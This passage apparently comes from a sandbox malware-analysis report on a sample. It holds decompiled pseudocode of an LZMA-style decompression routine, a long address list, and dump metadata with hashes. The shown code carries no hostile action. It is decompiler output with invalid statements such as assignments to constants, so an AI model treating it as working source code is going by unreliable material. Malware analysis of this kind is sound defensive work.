												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                0x00000000
                0x00406322
                0x00406322
                0x00406326
                0x00406347
                0x0040634e
                0x00406354
                0x0040635a
                0x0040636c
                0x00406372
                0x00406377
                0x00000000
                0x00406328
                0x0040632e
                0x004066ef
                0x004066ef
                0x004066ef
                0x004066f2
                0x004066f2
                0x004066f2
                0x004066f8
                0x004066fe
                0x00406704
                0x0040671e
                0x00406721
                0x00406727
                0x00406732
                0x00406734
                0x00406706
                0x00406706
                0x00406715
                0x00406719
                0x00406719
                0x0040673e
                0x00000000
                0x00000000
                0x00406740
                0x00406744
                0x004068f3
                0x00406909
                0x00406911
                0x00406918
                0x0040691a
                0x00406921
                0x00406925
                0x00406925
                0x00406750
                0x00406757
                0x0040675f
                0x00406762
                0x00406765
                0x00406765
                0x0040676b
                0x0040676b
                0x00405f07
                0x00405f07
                0x00405f07
                0x00405f10
                0x00000000
                0x00000000
                0x00405f16
                0x00000000
                0x00405f21
                0x00000000
                0x00000000
                0x00405f2a
                0x00405f2d
                0x00405f30
                0x00405f34
                0x00000000
                0x00000000
                0x00405f3a
                0x00405f3d
                0x00405f3f
                0x00405f40
                0x00405f43
                0x00405f45
                0x00405f46
                0x00405f48
                0x00405f4b
                0x00405f50
                0x00405f55
                0x00405f5e
                0x00405f71
                0x00405f74
                0x00405f80
                0x00405fa8
                0x00405faa
                0x00405fb8
                0x00405fb8
                0x00405fbc
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405fac
                0x00405fac
                0x00405faf
                0x00405fb0
                0x00405fb0
                0x00000000
                0x00405fac
                0x00405f86
                0x00405f8b
                0x00405f8b
                0x00405f94
                0x00405f9c
                0x00405f9f
                0x00000000
                0x00405fa5
                0x00405fa5
                0x00000000
                0x00405fa5
                0x00000000
                0x00405fc2
                0x00405fc2
                0x00405fc6
                0x00406872
                0x00000000
                0x00406872
                0x00405fcf
                0x00405fdf
                0x00405fe2
                0x00405fe5
                0x00405fe5
                0x00405fe5
                0x00405fe8
                0x00405fec
                0x00000000
                0x00000000
                0x00405fee
                0x00405ff4
                0x0040601e
                0x00406024
                0x0040602b
                0x00000000
                0x0040602b
                0x00405ffa
                0x00405ffd
                0x00406002
                0x00406002
                0x0040600d
                0x00406015
                0x00406018
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040605d
                0x00406063
                0x00406066
                0x00406073
                0x0040607b
                0x00000000
                0x00000000
                0x00406032
                0x00406032
                0x00406036
                0x00406881
                0x00000000
                0x00406881
                0x00406042
                0x0040604d
                0x0040604d
                0x0040604d
                0x00406050
                0x00406053
                0x00406056
                0x0040605b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004066f2
                0x004066f2
                0x004066f8
                0x004066fe
                0x00406704
                0x0040671e
                0x00406721
                0x00406727
                0x00406732
                0x00406734
                0x00406706
                0x00406706
                0x00406715
                0x00406719
                0x00406719
                0x0040673e
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406083
                0x00406085
                0x00406088
                0x004060f9
                0x004060fc
                0x004060ff
                0x00406106
                0x00406110
                0x004066ef
                0x004066ef
                0x00000000
                0x004066ef
                0x0040608a
                0x0040608e
                0x00406091
                0x00406093
                0x00406096
                0x00406099
                0x0040609b
                0x0040609e
                0x004060a0
                0x004060a5
                0x004060a8
                0x004060ab
                0x004060af
                0x004060b6
                0x004060b9
                0x004060c0
                0x004060c4
                0x004060cc
                0x004060cc
                0x004060cc
                0x004060c6
                0x004060c6
                0x004060c6
                0x004060bb
                0x004060bb
                0x004060bb
                0x004060d0
                0x004060d3
                0x004060f1
                0x004060f3
                0x00000000
                0x004060d5
                0x004060d5
                0x004060d8
                0x004060db
                0x004060de
                0x004060e0
                0x004060e0
                0x004060e0
                0x004060e3
                0x004060e6
                0x004060e8
                0x004060e9
                0x004060ec
                0x00000000
                0x004060ec
                0x00000000
                0x00000000
                0x00000000
                0x0040638c
                0x00406390
                0x004063b3
                0x004063b6
                0x004063b9
                0x004063c3
                0x00406392
                0x00406392
                0x00406395
                0x00406398
                0x0040639b
                0x004063a8
                0x004063ab
                0x004063ab
                0x004066ef
                0x004066ef
                0x004066ef
                0x00000000
                0x004066ef
                0x00000000
                0x004063cf
                0x004063d3
                0x00000000
                0x00000000
                0x004063d9
                0x004063dd
                0x00000000
                0x00000000
                0x004063e3
                0x004063e5
                0x004063e9
                0x004063e9
                0x004063ec
                0x004063f0
                0x00000000
                0x00000000
                0x00406440
                0x00406444
                0x0040644b
                0x0040644e
                0x00406451
                0x0040645b
                0x004066ef
                0x004066ef
                0x004066ef
                0x00000000
                0x004066ef
                0x004066ef
                0x00406446
                0x00000000
                0x00000000
                0x00406467
                0x0040646b
                0x00406472
                0x00406475
                0x00406478
                0x0040646d
                0x0040646d
                0x0040646d
                0x0040647b
                0x0040647e
                0x00406481
                0x00406481
                0x00406484
                0x00406487
                0x0040648a
                0x0040648a
                0x0040648d
                0x00406494
                0x00406499
                0x00000000
                0x00000000
                0x00406527
                0x00406527
                0x0040652b
                0x004068c9
                0x00000000
                0x004068c9
                0x00406531
                0x00406534
                0x00406537
                0x0040653b
                0x0040653e
                0x00406544
                0x00406546
                0x00406546
                0x00406546
                0x00406549
                0x0040654c
                0x00000000
                0x00000000
                0x0040611c
                0x0040611c
                0x00406120
                0x0040688d
                0x00000000
                0x0040688d
                0x00406126
                0x00406129
                0x0040612c
                0x00406130
                0x00406133
                0x00406139
                0x0040613b
                0x0040613b
                0x0040613b
                0x0040613e
                0x00406141
                0x00406141
                0x00406144
                0x00406147
                0x00000000
                0x00000000
                0x0040614d
                0x00406153
                0x00000000
                0x00000000
                0x00406159
                0x00406159
                0x0040615d
                0x00406160
                0x00406163
                0x00406166
                0x00406169
                0x0040616a
                0x0040616d
                0x0040616f
                0x00406175
                0x00406178
                0x0040617b
                0x0040617e
                0x00406181
                0x00406184
                0x00406187
                0x004061a3
                0x004061a6
                0x004061a9
                0x004061ac
                0x004061b3
                0x004061b7
                0x004061b9
                0x004061bd
                0x00406189
                0x00406189
                0x0040618d
                0x00406195
                0x0040619a
                0x0040619c
                0x0040619e
                0x0040619e
                0x004061c0
                0x004061c7
                0x004061ca
                0x00000000
                0x004061d0
                0x00000000
                0x004061d0
                0x00000000
                0x004061d5
                0x004061d5
                0x004061d9
                0x00406899
                0x00000000
                0x00406899
                0x004061df
                0x004061e2
                0x004061e5
                0x004061e9
                0x004061ec
                0x004061f2
                0x004061f4
                0x004061f4
                0x004061f4
                0x004061f7
                0x004061fa
                0x004061fa
                0x004061fa
                0x00406200
                0x00000000
                0x00000000
                0x00406202
                0x00406205
                0x00406208
                0x0040620b
                0x0040620e
                0x00406211
                0x00406214
                0x00406217
                0x0040621a
                0x0040621d
                0x00406220
                0x00406238
                0x0040623b
                0x0040623e
                0x00406241
                0x00406241
                0x00406244
                0x00406248
                0x0040624a
                0x00406222
                0x00406222
                0x0040622a
                0x0040622f
                0x00406231
                0x00406233
                0x00406233
                0x0040624d
                0x00406254
                0x00406257
                0x00000000
                0x00406259
                0x00000000
                0x00406259
                0x00406257
                0x0040625e
                0x0040625e
                0x0040625e
                0x0040625e
                0x00000000
                0x00000000
                0x00406299
                0x00406299
                0x0040629d
                0x004068a5
                0x00000000
                0x004068a5
                0x004062a3
                0x004062a6
                0x004062a9
                0x004062ad
                0x004062b0
                0x004062b6
                0x004062b8
                0x004062b8
                0x004062b8
                0x004062bb
                0x004062be
                0x004062be
                0x004062c4
                0x00406262
                0x00406262
                0x00406265
                0x00000000
                0x00406265
                0x004062c6
                0x004062c6
                0x004062c9
                0x004062cc
                0x004062cf
                0x004062d2
                0x004062d5
                0x004062d8
                0x004062db
                0x004062de
                0x004062e1
                0x004062e4
                0x004062fc
                0x004062ff
                0x00406302
                0x00406305
                0x00406305
                0x00406308
                0x0040630c
                0x0040630e
                0x004062e6
                0x004062e6
                0x004062ee
                0x004062f3
                0x004062f5
                0x004062f7
                0x004062f7
                0x00406311
                0x00406318
                0x0040631b
                0x00000000
                0x0040631d
                0x00000000
                0x0040631d
                0x00000000
                0x004065aa
                0x004065aa
                0x004065ae
                0x004068d5
                0x00000000
                0x004068d5
                0x004065b4
                0x004065b7
                0x004065ba
                0x004065be
                0x004065c1
                0x004065c7
                0x004065c9
                0x004065c9
                0x004065c9
                0x004065cc
                0x00000000
                0x00000000
                0x0040637a
                0x0040637a
                0x0040637d
                0x004066ef
                0x004066ef
                0x004066ef
                0x00000000
                0x004066ef
                0x00000000
                0x004066b9
                0x004066bd
                0x004066df
                0x004066e2
                0x004066ec
                0x004066ef
                0x004066ef
                0x004066ef
                0x00000000
                0x004066ef
                0x004066ef
                0x004066bf
                0x004066c2
                0x004066c6
                0x004066c9
                0x004066c9
                0x004066cc
                0x00000000
                0x00000000
                0x00406776
                0x0040677a
                0x00406798
                0x00406798
                0x00406798
                0x0040679f
                0x004067a6
                0x004067ad
                0x004067ad
                0x00000000
                0x004067ad
                0x0040677c
                0x0040677f
                0x00406782
                0x00406785
                0x0040678c
                0x004066d0
                0x004066d0
                0x004066d3
                0x00000000
                0x00000000
                0x00406867
                0x0040686a
                0x0040676b
                0x00000000
                0x00000000
                0x004064a1
                0x004064a3
                0x004064aa
                0x004064ab
                0x004064ad
                0x004064b0
                0x00000000
                0x00000000
                0x004064b8
                0x004064bb
                0x004064be
                0x004064c0
                0x004064c2
                0x004064c2
                0x004064c3
                0x004064c6
                0x004064cd
                0x004064d0
                0x004064de
                0x00000000
                0x00000000
                0x004067b4
                0x004067b4
                0x004067b7
                0x004067be
                0x00000000
                0x00000000
                0x004067c3
                0x004067c3
                0x004067c7
                0x004068ff
                0x00000000
                0x004068ff
                0x004067cd
                0x004067d0
                0x004067d3
                0x004067d7
                0x004067da
                0x004067e0
                0x004067e2
                0x004067e2
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e8
                0x004067e8
                0x004067e8
                0x004067eb
                0x004067eb
                0x004067ef
                0x0040684f
                0x00406852
                0x00406857
                0x00406858
                0x0040685a
                0x0040685c
                0x0040685f
                0x0040676b
                0x0040676b
                0x00000000
                0x00406771
                0x0040676b
                0x004067f1
                0x004067f7
                0x004067fa
                0x004067fd
                0x00406800
                0x00406803
                0x00406806
                0x00406809
                0x0040680c
                0x0040680f
                0x00406812
                0x0040682b
                0x0040682e
                0x00406831
                0x00406834
                0x00406838
                0x0040683a
                0x0040683a
                0x0040683b
                0x0040683e
                0x00406814
                0x00406814
                0x0040681c
                0x00406821
                0x00406823
                0x00406826
                0x00406826
                0x00406841
                0x00406848
                0x00000000
                0x0040684a
                0x00000000
                0x0040684a
                0x00000000
                0x004064e6
                0x004064e9
                0x0040651f
                0x0040664f
                0x0040664f
                0x0040664f
                0x0040664f
                0x00406652
                0x00406652
                0x00406655
                0x00406657
                0x004068e1
                0x00000000
                0x004068e1
                0x0040665d
                0x00406660
                0x00000000
                0x00000000
                0x00406666
                0x0040666a
                0x0040666d
                0x0040666d
                0x0040666d
                0x00000000
                0x0040666d
                0x004064eb
                0x004064ed
                0x004064ef
                0x004064f1
                0x004064f4
                0x004064f5
                0x004064f7
                0x004064f9
                0x004064fc
                0x004064ff
                0x00406515
                0x0040651a
                0x00406552
                0x00406552
                0x00406556
                0x00406582
                0x00406584
                0x0040658b
                0x0040658e
                0x00406591
                0x00406591
                0x00406596
                0x00406596
                0x00406598
                0x0040659b
                0x004065a2
                0x004065a5
                0x004065d2
                0x004065d2
                0x004065d5
                0x004065d8
                0x0040664c
                0x0040664c
                0x0040664c
                0x00000000
                0x0040664c
                0x004065da
                0x004065e0
                0x004065e3
                0x004065e6
                0x004065e9
                0x004065ec
                0x004065ef
                0x004065f2
                0x004065f5
                0x004065f8
                0x004065fb
                0x00406614
                0x00406616
                0x00406619
                0x0040661a
                0x0040661d
                0x0040661f
                0x00406622
                0x00406624
                0x00406626
                0x00406629
                0x0040662b
                0x0040662e
                0x00406632
                0x00406634
                0x00406634
                0x00406635
                0x00406638
                0x0040663b
                0x004065fd
                0x004065fd
                0x00406605
                0x0040660a
                0x0040660c
                0x0040660f
                0x0040660f
                0x0040663e
                0x00406645
                0x004065cf
                0x004065cf
                0x004065cf
                0x004065cf
                0x00000000
                0x00406647
                0x00000000
                0x00406647
                0x00406645
                0x00406558
                0x0040655b
                0x0040655d
                0x00406560
                0x00406563
                0x00406566
                0x00406568
                0x0040656b
                0x0040656e
                0x0040656e
                0x00406571
                0x00406571
                0x00406574
                0x0040657b
                0x0040654f
                0x0040654f
                0x0040654f
                0x0040654f
                0x00000000
                0x0040657d
                0x00000000
                0x0040657d
                0x0040657b
                0x00406501
                0x00406504
                0x00406506
                0x00406509
                0x00000000
                0x00000000
                0x00406268
                0x00406268
                0x0040626c
                0x004068b1
                0x00000000
                0x004068b1
                0x00406272
                0x00406275
                0x00406278
                0x0040627b
                0x0040627e
                0x00406281
                0x00406284
                0x00406286
                0x00406289
                0x0040628c
                0x0040628f
                0x00406291
                0x00406291
                0x00406291
                0x00000000
                0x00000000
                0x004063f3
                0x004063f3
                0x004063f7
                0x004068bd
                0x00000000
                0x004068bd
                0x004063fd
                0x00406400
                0x00406403
                0x00406406
                0x00406408
                0x00406408
                0x00406408
                0x0040640b
                0x0040640e
                0x00406411
                0x00406414
                0x00406417
                0x0040641a
                0x0040641b
                0x0040641d
                0x0040641d
                0x0040641d
                0x00406420
                0x00406423
                0x00406426
                0x00406429
                0x00406429
                0x00406429
                0x0040642c
                0x0040642e
                0x0040642e
                0x00000000
                0x00000000
                0x00406670
                0x00406670
                0x00406670
                0x00406674
                0x00000000
                0x00000000
                0x0040667a
                0x0040667d
                0x00406680
                0x00406683
                0x00406685
                0x00406685
                0x00406685
                0x00406688
                0x0040668b
                0x0040668e
                0x00406691
                0x00406694
                0x00406697
                0x00406698
                0x0040669a
                0x0040669a
                0x0040669a
                0x0040669d
                0x004066a0
                0x004066a3
                0x004066a6
                0x004066a9
                0x004066ad
                0x004066af
                0x004066b2
                0x00000000
                0x004066b4
                0x00406431
                0x00406431
                0x00000000
                0x00406431
                0x004066b2
                0x004068e7
                0x00000000
                0x00000000
                0x00405f16
                0x0040691e
                0x0040691e
                0x00000000
                0x0040691e
                0x0040676b
                0x004066f2
                0x004066ef
                0x00000000
                0x00406326

                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 23d90c1db76db7edd9cc4d8a45db571517f104fb6d742d4438539565e12cc062
                • Instruction ID: ded64b1a4db59f6dff1a94f5a9d162ff15a4dde6347ba0f82720ffa54b61a1b0
                • Opcode Fuzzy Hash: 23d90c1db76db7edd9cc4d8a45db571517f104fb6d742d4438539565e12cc062
                • Instruction Fuzzy Hash: 09711371D00229CFDF28CF98C844BADBBB1FB44305F25816AD856BB281D7789A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406440 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E00406440() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00406926))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
